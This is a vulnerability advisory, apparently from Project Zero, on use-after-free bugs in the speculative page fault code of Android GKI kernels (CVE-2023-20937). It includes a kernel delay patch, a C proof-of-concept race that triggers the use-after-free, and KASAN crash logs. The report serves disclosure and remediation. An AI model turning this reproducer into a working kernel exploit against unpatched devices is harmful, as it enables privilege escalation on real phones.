Android GKI Kernels Contain Broken Non-Upstream Speculative Page Faults MM Code

2023.03.06
Credit: Jann Horn
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

Android: GKI kernels contain broken non-upstream Speculative Page Faults MM code A central recurring theme in Linux MM development is that contention on the mmap lock can have a big negative performance impact on multithreaded workloads: If one thread is holding the mmap lock in exclusive mode for an extended amount of time, other threads will block as soon as they try to handle a page fault. Therefore there is a bunch of work to downgrade exclusive lock holders to non-exclusive lock holders, shrink critical sections, and avoid holding the lock altogether in some cases. One proposal to avoid holding the mmap lock in page fault handling are \"Speculative page faults (SPF)\"; here's a patch series from 2019 that had already gone through 11 rounds of review: <https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/> This patch series didn't land at the time; but something along those lines might land upstream in the next few years. But for some reason, Android decided that they need speculative page faults immediately, and merged the patches that were discussed on the upstream mailing list into their GKI kernels. This is problematic for two reasons: A) The MM code is complicated and easy to get wrong. If you run MM code that has not been through the fuzzing, testing and review that committed upstream code gets, there's a higher chance of undiscovered bugs. B) The SPF patches **change the rules** that MM code has to follow, so now Android's version of MM has different rules than upstream MM. This means that any patches in vaguely related parts of upstream MM need to be checked by an Android engineer to see if they conflict with Android's special rules. As far as I can tell, there are a bunch of memory safety bugs in the SPF version that is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b): 1. handle_pte_fault() calls pmd_none() without protection against concurrent page table deletion, leading to UAF read. 2. do_anonymous_page() calls pte_alloc() without protection against concurrent page table deletion, leading to UAF write. 3. do_anonymous_page() calls pmd_trans_unstable() without protection against concurrent page table deletion, leading to UAF read. 4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates on a page table without protection against concurrent page table deletion, leading to use-after-union-change read+write in struct page (on the page table lock) and use-after-free read of a page table entry (resulting in bogus page* calculation) 5. do_wp_page() calls handle_userfault() without protection against concurrent userfaultfd_release(), leading to UAF reads of some flags from userfaultfd_ctx. I think back when the SPF series was posted upstream, there might have been sufficient protection against this (because ___handle_speculative_fault() bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd support was added, and ___handle_speculative_fault() doesn't bail on VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses userfaultfd_pte_wp() which reads flags from the VMA. 6. The way seqcounts are used to detect concurrent writers looks wrong. The seqcount API requires that only one writer at a time can be in a vm_write_begin() / vm_write_end() section, but these helpers are used in codepaths that only hold the mmap lock in shared mode, so there can be concurrent writers. As far as I can tell, this means that when there are an even number of concurrent writers, it will look as if there are no active writers. This _probably_ doesn't have much security impact because all of the places that do vm_write_begin() where concurrency would be an actual problem seem to hold the mmap lock in exclusive mode? As an example, I tested issue 2. To reproduce this easily, I patched an extra delay into the kernel: ``` diff --git a/mm/memory.c b/mm/memory.c index 83b715ed65775..35ce412d0a965 100644 --- a/mm/memory.c +++ b/mm/memory.c @@ -84,6 +84,8 @@ #include <asm/tlb.h> #include <asm/tlbflush.h> +#include <linux/delay.h> + #include \"pgalloc-track.h\" #include \"internal.h\" @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf) vm_fault_t ret = 0; pte_t entry; + if (strcmp(current->comm, \"SLOWME\") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) { + pr_warn(\"%s: BEGIN DELAY 0x%lx\ \", __func__, vmf->address); + mdelay(2000); + pr_warn(\"%s: END DELAY 0x%lx\ \", __func__, vmf->address); + } + /* File mapping without ->vm_ops ? */ if (vmf->vma_flags & VM_SHARED) return VM_FAULT_SIGBUS; ``` Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT: ``` #define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <unistd.h> #include <sys/prctl.h> #include <sys/mman.h> // basic idea: // delete the 1G-covering page table while do_anonymous_page() is at its entry // point #define VMA_ADDR ((void*)0x40000000UL) #define VMA_SIZE (0x40000000UL) #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) static void *thread_fn(void *dummy) { SYSCHK(prctl(PR_SET_NAME, \"SLOWME\")); *(volatile char *)VMA_ADDR; SYSCHK(prctl(PR_SET_NAME, \"spfthread\")); } int main(void) { SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0)); SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE)); // create anon_vma and page tables *(volatile char *)(VMA_ADDR+0x1000) = 1; pthread_t thread; if (pthread_create(&thread, NULL, thread_fn, NULL)) errx(1, \"pthread_create\"); sleep(1); munmap(VMA_ADDR, VMA_SIZE); if (pthread_join(thread, NULL)) errx(1, \"pthread_join\"); return 0; } ``` This first results in a UAF read of a PTE: ``` do_anonymous_page: BEGIN DELAY 0x40000000 do_anonymous_page: END DELAY 0x40000000 ================================================================== BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) Read of size 8 at addr ffff88800f358000 by task SLOWME/724 CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014 Call Trace: dump_stack_lvl (lib/dump_stack.c:120) [...] print_address_description.constprop.0 (mm/kasan/report.c:257) [...] [...] kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460) [...] handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) [...] ___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106) [...] __handle_speculative_fault (mm/memory.c:5148) [...] do_user_addr_fault (arch/x86/mm/fault.c:1320) [...] exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518) [...] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571) RIP: 0033:0x55d52bfe41fb ``` Then pte_alloc() tries to lock the page table entry: ``` BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112) Read of size 4 at addr ffff88801a730004 by task SLOWME/724 ``` and after that, it will write into the freed page table. From a security perspective, my recommendation is to fix this by reverting the speculative page fault patches out of the GKI trees, since I believe that such a divergence from upstream semantics is not maintainable. Looking through the commit history of the AOSP android13-5.10 kernel branch also shows that a series of bugs have already been discovered that were introduced by SPF: 81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry 88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults 320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path 729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPF c3cbea92297d5 ANDROID: mm: avoid writing to read-only elements dd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handling cf397c6c269ac ANDROID: mm: sync rss in speculative page fault path 531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page fault This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-02-01. Please note that, according to our disclosure policy, if Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline. Project Zero will consider new race conditions where the SPF fault path accesses page tables or the VMA without sufficient locking variants of this issue. This includes issues that are introduced after this bug is reported. For more details, see https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html. Related CVE Number: CVE-2023-20937. Found by: jannh@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top